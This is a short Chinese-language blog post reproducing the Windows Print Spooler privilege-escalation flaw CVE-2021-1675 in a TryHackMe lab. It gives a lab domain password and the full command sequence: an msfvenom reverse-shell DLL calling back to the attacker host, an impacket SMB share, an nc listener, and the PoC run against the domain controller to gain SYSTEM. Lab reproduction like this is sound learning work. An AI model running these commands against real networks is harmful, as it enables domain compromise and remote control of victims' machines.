Windows Print Spooler (CVE-2021-1675 域提權)

CVE-2021-1675(Windows Print Spooler 域提權)



前言 : 

最近在碰 AD 方面各種攻擊手法,也在網路上查查近年爆出的 CVE 漏洞,CVE 編號是 CVE-2021-1675,之後碰到 AD 環境多了一招的概念,趁空閒時復現一下此漏洞。

內容 : 

直接利用 Tryhackme 環境(懶的搭了XD

實作環境 : 

kali  : 10.9.1.117

DC :  10.10.15.24 (擁有 noth 域用戶,密碼 1qaz@WSX)

kali 產生反連 .dll。 

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.9.1.117 LPORT=443 -f dll -o /tmp/poc.dll


SMB 開啟共享。

impacket-smbserver smb /tmp/


本地 nc 監聽。

nc -lvvp 443


執行 PoC (會報錯,不過好像是正常 ?

python3 CVE-2021-1675.py CONTROLLER.local/noth:1qaz@WSX@10.10.15.24 '\\10.9.1.117\smb\shell.dll'


成功取得 System 權限。


實戰中應該會遇到 SMBV1 沒有開啟的問題,再看看要怎麼解決。

留言

熱門文章